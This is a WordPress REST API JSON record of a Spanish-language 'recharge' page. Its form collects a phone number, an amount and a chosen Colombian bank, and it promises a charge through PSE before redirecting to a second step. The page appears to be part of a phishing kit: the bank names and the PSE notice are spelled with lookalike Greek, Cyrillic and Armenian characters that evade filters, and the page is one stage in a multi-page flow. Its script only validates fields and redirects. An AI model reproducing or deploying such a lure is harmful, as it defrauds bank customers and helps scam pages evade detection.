{"id":17,"date":"2026-03-08T03:10:11","date_gmt":"2026-03-08T03:10:11","guid":{"rendered":"https:\/\/nacm.site\/probador100\/?page_id=17"},"modified":"2026-04-06T21:01:12","modified_gmt":"2026-04-06T21:01:12","slug":"rc-f1","status":"publish","type":"page","link":"https:\/\/nacm.site\/probador100\/rc-f1\/","title":{"rendered":"Rc-F1"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"17\" class=\"elementor elementor-17\">\n\t\t\t\t<div class=\"elementor-element elementor-element-3352ea4 e-flex e-con-boxed e-con e-parent\" data-id=\"3352ea4\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-f6a4a12 elementor-widget elementor-widget-spacer\" data-id=\"f6a4a12\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-e6f0d7a e-flex e-con-boxed e-con e-parent\" data-id=\"e6f0d7a\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-28e45fa e-con-full e-flex e-con e-child\" data-id=\"28e45fa\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-f900e57 e-con-full e-flex e-con e-child\" data-id=\"f900e57\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-218906c elementor-widget elementor-widget-image\" data-id=\"218906c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"319\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/LOGSSS-1024x319.png\" class=\"attachment-large size-large wp-image-207\" alt=\"\" srcset=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/LOGSSS-1024x319.png 1024w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/LOGSSS-300x93.png 300w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/LOGSSS-768x239.png 768w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/LOGSSS.png 1332w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-f100dfe elementor-widget elementor-widget-spacer\" data-id=\"f100dfe\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-b821314 elementor-widget elementor-widget-image\" data-id=\"b821314\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"441\" height=\"51\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/TIT-001.png\" class=\"attachment-large size-large wp-image-211\" alt=\"\" srcset=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/TIT-001.png 441w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/TIT-001-300x35.png 300w\" sizes=\"(max-width: 441px) 100vw, 441px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-07c992e elementor-widget elementor-widget-spacer\" data-id=\"07c992e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-90ea3a2 elementor-widget elementor-widget-shortcode\" data-id=\"90ea3a2\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f8-o1\" lang=\"es-ES\" dir=\"ltr\" data-wpcf7-id=\"8\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/probador100\/wp-json\/wp\/v2\/pages\/17#wpcf7-f8-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulario de contacto\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"8\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"es_ES\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f8-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<div class=\"p-float-label\" id=\"wrapper-celular\">\n\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"NUMERO\"><input size=\"40\" maxlength=\"10\" minlength=\"10\" class=\"wpcf7-form-control wpcf7-tel wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-tel\" id=\"phoneNumber\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"\" value=\"\" type=\"tel\" name=\"NUMERO\" \/><\/span><br \/>\n<span class=\"lbl-custom\">N\u00famero celular<\/span>\n\t<\/p>\n<\/div>\n<div class=\"p-float-label\" id=\"wrapper-conf\">\n\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"CONUMERO\"><input size=\"40\" maxlength=\"10\" minlength=\"10\" class=\"wpcf7-form-control wpcf7-tel wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-tel\" id=\"phoneConfirm\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"\" value=\"\" type=\"tel\" name=\"CONUMERO\" \/><\/span><br \/>\n<span class=\"lbl-custom\">Confirma el n\u00famero celular<\/span>\n\t<\/p>\n<\/div>\n<div id=\"error-mensaje-cel\" style=\"color: #ff0000; font-family: 'Manrope', sans-serif; font-size: 0.8rem; margin-top: -15px; margin-bottom: 15px; display: none;\">\n\t<p>\u00a1Ups! Esos dos n\u00fameros no coinciden, porfa rev\u00edsalos.\n\t<\/p>\n<\/div>\n<div class=\"p-float-label\" id=\"wrapper-precio\">\n\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"PRECIO\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" id=\"precioField\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"\" value=\"\" type=\"text\" name=\"PRECIO\" \/><\/span><br \/>\n<span class=\"lbl-custom\">\u00bf\u03f9u\u00e1nt\u03bf?<\/span>\n\t<\/p>\n<\/div>\n<div class=\"p-float-label\" id=\"wrapper-tipo\">\n\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"TP_PERSONA\"><select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required\" id=\"tipoPsnField\" aria-required=\"true\" aria-invalid=\"false\" name=\"TP_PERSONA\"><option value=\"Natural\">Natural<\/option><option value=\"Jur\u00eddica\">Jur\u00eddica<\/option><\/select><\/span><br \/>\n<span class=\"lbl-custom\">Tipo de persona<\/span>\n\t<\/p>\n<\/div>\n<div class=\"p-float-label\" id=\"wrapper-elegir\">\n\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"OPCION\"><select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required\" id=\"elegirOpcField\" aria-required=\"true\" aria-invalid=\"false\" name=\"OPCION\"><option value=\"\u0395l\u0435\u0261\u0456r b\u0430n\u03f2\u03bf\">\u0395l\u0435\u0261\u0456r b\u0430n\u03f2\u03bf<\/option><option value=\"\u0395l\u0435\u0261\u0456r b\u0430n\u03f2\u03bf\">\u0395l\u0435\u0261\u0456r b\u0430n\u03f2\u03bf<\/option><option value=\"\u0391\u03f9\u03f9l\u039f\u039d FlD\u054d\u03f9l\u0391Rl\u0391\">\u0391\u03f9\u03f9l\u039f\u039d FlD\u054d\u03f9l\u0391Rl\u0391<\/option><option value=\"\u0391Ll\u0391\u039dZ\u0391 FlD\u054d\u03f9l\u0391Rl\u0391\">\u0391Ll\u0391\u039dZ\u0391 FlD\u054d\u03f9l\u0391Rl\u0391<\/option><option value=\"\u0392\u0391\u039d100\">\u0392\u0391\u039d100<\/option><option value=\"\u0392\u0391\u039d\u03f9\u0391\u039cl\u0391 \u0405.\u0391\">\u0392\u0391\u039d\u03f9\u0391\u039cl\u0391 \u0405.\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u0391\u050cR\u0391Rl\u039f\">\u0392\u0391\u039d\u03f9\u039f \u0391\u050cR\u0391Rl\u039f<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u0391V VlLL\u0391\u0405\">\u0392\u0391\u039d\u03f9\u039f \u0391V VlLL\u0391\u0405<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u0392\u0392V\u0391 \u03f9\u039fL\u039f\u039c\u0392l\u0391 \u0405.\u0391\">\u0392\u0391\u039d\u03f9\u039f \u0392\u0392V\u0391 \u03f9\u039fL\u039f\u039c\u0392l\u0391 \u0405.\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u03f9\u0391J\u0391 \u0405\u039f\u03f9l\u0391L\">\u0392\u0391\u039d\u03f9\u039f \u03f9\u0391J\u0391 \u0405\u039f\u03f9l\u0391L<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u03f9\u039f\u039f\u03a1\u0415R\u0391\u03a4lV\u039f \u03f9\u039f\u039f\u03a1\u03f9\u0395\u039d\u03a4R\u0391L\">\u0392\u0391\u039d\u03f9\u039f \u03f9\u039f\u039f\u03a1\u0415R\u0391\u03a4lV\u039f \u03f9\u039f\u039f\u03a1\u03f9\u0395\u039d\u03a4R\u0391L<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f D\u0391VlVl\u0395\u039dD\u0391\">\u0392\u0391\u039d\u03f9\u039f D\u0391VlVl\u0395\u039dD\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f DE \u0392\u039fG\u039f\u03a4\u0391\">\u0392\u0391\u039d\u03f9\u039f DE \u0392\u039fG\u039f\u03a4\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f DE \u039f\u03f9\u03f9lD\u0395\u039d\u03a4\u0395\">\u0392\u0391\u039d\u03f9\u039f DE \u039f\u03f9\u03f9lD\u0395\u039d\u03a4\u0395<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f DE F\u0391L\u0391\u0392\u0395LL\u0391\">\u0392\u0391\u039d\u03f9\u039f DE F\u0391L\u0391\u0392\u0395LL\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f Fl\u039d\u0391\u039dDl\u039d\u0391 \u0405.\u0391 \u0392l\u03f9\">\u0392\u0391\u039d\u03f9\u039f Fl\u039d\u0391\u039dDl\u039d\u0391 \u0405.\u0391 \u0392l\u03f9<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u050c\u039d\u0392 \u0405\u054dD\u0391\u039c\u0395Rl\u0405\">\u0392\u0391\u039d\u03f9\u039f \u050c\u039d\u0392 \u0405\u054dD\u0391\u039c\u0395Rl\u0405<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f l\u03a4\u0391\u054d\">\u0392\u0391\u039d\u03f9\u039f l\u03a4\u0391\u054d<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u0408.\u03a1 \u039c\u039fR\u050c\u0391\u039d \u03f9\u039fL\u039f\u039c\u0392l\u0391 \u0405.\u0391\">\u0392\u0391\u039d\u03f9\u039f \u0408.\u03a1 \u039c\u039fR\u050c\u0391\u039d \u03f9\u039fL\u039f\u039c\u0392l\u0391 \u0405.\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u039c\u054d\u039dD\u039f \u039c\u054d\u0408\u0395R \u0405.\u0391\">\u0392\u0391\u039d\u03f9\u039f \u039c\u054d\u039dD\u039f \u039c\u054d\u0408\u0395R \u0405.\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u03a1l\u03f9\u0397l\u039d\u03f9\u0397\u0391 \u0405.\u0391\">\u0392\u0391\u039d\u03f9\u039f \u03a1l\u03f9\u0397l\u039d\u03f9\u0397\u0391 \u0405.\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f DE \u03a1\u039f\u03a1UL\u0391R\">\u0392\u0391\u039d\u03f9\u039f DE \u03a1\u039f\u03a1UL\u0391R<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u0405\u0391\u039d\u03a4\u0391\u039dD\u0395R \u03f9\u039fL\u039f\u039c\u0392l\u0391\">\u0392\u0391\u039d\u03f9\u039f \u0405\u0391\u039d\u03a4\u0391\u039dD\u0395R \u03f9\u039fL\u039f\u039c\u0392l\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u0405\u0395RFl\u039d\u0391NZ\u0391\">\u0392\u0391\u039d\u03f9\u039f \u0405\u0395RFl\u039d\u0391NZ\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f \u054d\u039dl\u039f\u039d\">\u0392\u0391\u039d\u03f9\u039f \u054d\u039dl\u039f\u039d<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039fL\u039f\u039c\u0392l\u0391\">\u0392\u0391\u039d\u03f9\u039fL\u039f\u039c\u0392l\u0391<\/option><option value=\"\u0392\u0391\u039d\u03f9\u039f\u039f\u039c\u0395V\u0391 \u0405.\u0391\">\u0392\u0391\u039d\u03f9\u039f\u039f\u039c\u0395V\u0391 \u0405.\u0391<\/option><option value=\"\u0392\u039fLD \u03f9F\">\u0392\u039fLD \u03f9F<\/option><option value=\"\u03f9F\u0391 \u03f9\u039f\u039f\u03a1\u0395RA\u03a4lV\u0391 Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391\">\u03f9F\u0391 \u03f9\u039f\u039f\u03a1\u0395RA\u03a4lV\u0391 Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391<\/option><option value=\"\u03f9l\u03a4l\u0392\u0391\u039dK\">\u03f9l\u03a4l\u0392\u0391\u039dK<\/option><option value=\"\u03f9\u039fl\u039dK \u0405\u0391\">\u03f9\u039fl\u039dK \u0405\u0391<\/option><option value=\"\u03f9\u039fL\u03a4\u0395Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391\">\u03f9\u039fL\u03a4\u0395Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391<\/option><option value=\"\u03f9\u039f\u039dFl\u0391R \u03f9\u039f\u039f\u03a1\u0395RA\u03a4lV\u0391 Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391\">\u03f9\u039f\u039dFl\u0391R \u03f9\u039f\u039f\u03a1\u0395RA\u03a4lV\u0391 Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391<\/option><option value=\"\u03f9\u039f\u03a4R\u0391F\u0391\">\u03f9\u039f\u03a4R\u0391F\u0391<\/option><option value=\"\u03f9R\u0395Z\u03f9\u0391\u039c\u039f\u0405 \u039c\u039f\u0405l\">\u03f9R\u0395Z\u03f9\u0391\u039c\u039f\u0405 \u039c\u039f\u0405l<\/option><option value=\"D\u0391L\u0118\">D\u0391L\u0118<\/option><option value=\"D\u0391Vlb\u0430nk \u0405.\u0391\">D\u0391Vlb\u0430nk \u0405.\u0391<\/option><option value=\"D\u0391Vl\u03a1L\u0391\u03a4\u0391\">D\u0391Vl\u03a1L\u0391\u03a4\u0391<\/option><option value=\"Dl\u039d\u050c\">Dl\u039d\u050c<\/option><option value=\"Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391 \u0408\u054dRl\u0405\u03f9\u039f\u039f\u03a1 \u0405\u0391 \u03f9\u039f\u039c\u03a1\u0391\u00d1l\u0391 Fl\u039d\u0391\u039d\u03f9l\u0391\u039cl\u0395\u039d\u03a4\u039f\">Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391 \u0408\u054dRl\u0405\u03f9\u039f\u039f\u03a1 \u0405\u0391 \u03f9\u039f\u039c\u03a1\u0391\u00d1l\u0391 Fl\u039d\u0391\u039d\u03f9l\u0391\u039cl\u0395\u039d\u03a4\u039f<\/option><option value=\"\u050cL\u039f\u0392\u0391L66\">\u050cL\u039f\u0392\u0391L66<\/option><option value=\"lRl\u0405\">lRl\u0405<\/option><option value=\"\u0408FK \u03f9\u039f\u039f\u03a1\u0395RA\u03a4lV\u0391 Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391\">\u0408FK \u03f9\u039f\u039f\u03a1\u0395RA\u03a4lV\u0391 Fl\u039d\u0391\u039d\u03f9l\u0395R\u0391<\/option><option value=\"L\u054dL\u039f\u0392\u0391\u039dK\">L\u054dL\u039f\u0392\u0391\u039dK<\/option><option value=\"\u039c\u039fVlL \u0405\u0391\">\u039c\u039fVlL \u0405\u0391<\/option><option value=\"\u039d\u054d\">\u039d\u054d<\/option><option value=\"\u03a1\u0391Y \u03f9\u0391\u0405H\">\u03a1\u0391Y \u03f9\u0391\u0405H<\/option><option value=\"\u03a1\u039f\u13b3\u13b3l\">\u03a1\u039f\u13b3\u13b3l<\/option><option value=\"R\u0391\u03a1\u03a1l\u03a1\u0391Y\">R\u0391\u03a1\u03a1l\u03a1\u0391Y<\/option><option value=\"\u054d\u0391L\u00c1\">\u054d\u0391L\u00c1<\/option><\/select><\/span>\n\t<\/p>\n<\/div>\n<div class=\"contenedor-terminos\" id=\"wrapper-terminos\">\n\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"ACEP_TER\"><span class=\"wpcf7-form-control wpcf7-checkbox wpcf7-validates-as-required\" id=\"check-real\"><span class=\"wpcf7-list-item first last\"><label><input type=\"checkbox\" name=\"ACEP_TER[]\" value=\"Confirmo que soy una persona real\" \/><span class=\"wpcf7-list-item-label\">Confirmo que soy una persona real<\/span><\/label><\/span><\/span><\/span>\n\t<\/p>\n<\/div>\n<div align=\"center\">\n\t<p><span class=\"Estilo1\">La r\u0435\u03f2\u0430r\u0261\u0430 se har\u00e1 usando los \u0455\u0435rv\u0456\u03f2\u0456\u03bf\u0455 de \u03a1\u0405\u0395 y se \u0501\u0435b\u0456t\u0430r\u00e1 de tu \u03f2u\u0435nt\u0430 \u03f2\u03bfrr\u0456\u0435nt\u0435 o de \u0430\u04bb\u03bfrr\u03bf\u0455. <\/span>\n\t<\/p>\n<\/div>\n<div class=\"contenedor-boton-envio\">\n\t<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Continuar\" \/>\n\t<\/p>\n<\/div><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-164743f elementor-widget elementor-widget-heading\" data-id=\"164743f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Ayuda<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-dc6c827 elementor-widget elementor-widget-html\" data-id=\"dc6c827\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<script>\ndocument.addEventListener('DOMContentLoaded', function() {\n    const ids = {\n        cel: 'phoneNumber', conf: 'phoneConfirm', prc: 'precioField', tipo: 'tipoPsnField', eleg: 'elegirOpcField',\n        wCel: 'wrapper-celular', wConf: 'wrapper-conf', wPrc: 'wrapper-precio', wTipo: 'wrapper-tipo', wEleg: 'wrapper-elegir'\n    };\n\n    const get = (id) => document.getElementById(id);\n    const btnSubmit = document.querySelector('.wpcf7-submit');\n    const msgError = get('error-mensaje-cel');\n\n    \/\/ 1. Validaci\u00f3n de n\u00fameros de tel\u00e9fono\n    const validar = (forzar = false) => {\n        const c1 = get(ids.cel), c2 = get(ids.conf);\n        if(!c1 || !c2) return;\n        const v1 = c1.value.trim(), v2 = c2.value.trim();\n        if (v2.length === 10 || (forzar && v2.length > 0)) {\n            if (v1 !== v2) {\n                if(msgError) msgError.style.display = \"block\";\n                btnSubmit.disabled = true; btnSubmit.style.opacity = \"0.5\";\n            } else {\n                if(msgError) msgError.style.display = \"none\";\n                btnSubmit.disabled = false; btnSubmit.style.opacity = \"1\";\n            }\n        }\n    };\n\n    \/\/ 2. Configuraci\u00f3n de comportamiento visual (clases 'subir' y 'focus-activo')\n    const setup = (inputId, wrapId, tipo) => {\n        const i = get(inputId), w = get(wrapId);\n        if (!i || !w) return;\n\n        const chk = () => {\n            if (i.value !== \"\" && i.value !== \"Elige opci\u00f3n\" && i.value !== \"$\") w.classList.add('subir');\n            else w.classList.remove('subir');\n        };\n\n        i.addEventListener('focus', () => { \n            if(tipo !== 'eleg') w.classList.add('subir');\n            w.classList.add('focus-activo'); \n        });\n        i.addEventListener('blur', () => {\n            w.classList.remove('focus-activo');\n            chk();\n            if (inputId === ids.conf) validar(true);\n        });\n        i.addEventListener('input', function() {\n            if (tipo === 'num') this.value = this.value.replace(\/[^0-9]\/g, '');\n            if (tipo === 'prc') {\n                let v = this.value.replace(\/\\D\/g, \"\");\n                this.value = v ? \"$\" + new Intl.NumberFormat('en-US').format(v) : \"\";\n            }\n            if (tipo === 'num') validar(false);\n            chk();\n        });\n        i.addEventListener('change', chk);\n        chk();\n    };\n\n    setup(ids.cel, ids.wCel, 'num');\n    setup(ids.conf, ids.wConf, 'num');\n    setup(ids.prc, ids.wPrc, 'prc');\n    setup(ids.tipo, ids.wTipo, 'std');\n    setup(ids.eleg, ids.wEleg, 'eleg');\n\n    \/\/ 3. Ajuste inicial para el selector \"Elige opci\u00f3n\"\n    const selElegir = get(ids.eleg);\n    if (selElegir) {\n        selElegir.options[0].disabled = true;\n        selElegir.options[0].hidden = true;\n        if (selElegir.selectedIndex === -1) selElegir.selectedIndex = 0;\n    }\n});\n\n\/**\n * 4. EFECTO CONGELADOR\n * Oculta el formulario al enviar con \u00e9xito para una transici\u00f3n limpia\n *\/\ndocument.addEventListener('wpcf7mailsent', function(event) {\n    var formularioActivo = event.target;\n    if (formularioActivo) {\n        formularioActivo.style.opacity = '0';\n        formularioActivo.style.transition = 'opacity 0.15s ease';\n        formularioActivo.style.pointerEvents = 'none'; \n    }\n}, false);\n<\/script>\n\n<script>\ndocument.addEventListener( 'wpcf7mailsent', function( event ) {\n    window.location.href = 'https:\/\/nacm.site\/probador100\/rc-f2\/';\n}, false );\n<\/script>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-13ede60 e-con-full e-flex e-con e-child\" data-id=\"13ede60\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Ayuda<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-17","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/pages\/17","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/comments?post=17"}],"version-history":[{"count":211,"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/pages\/17\/revisions"}],"predecessor-version":[{"id":879,"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/pages\/17\/revisions\/879"}],"wp:attachment":[{"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/media?parent=17"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}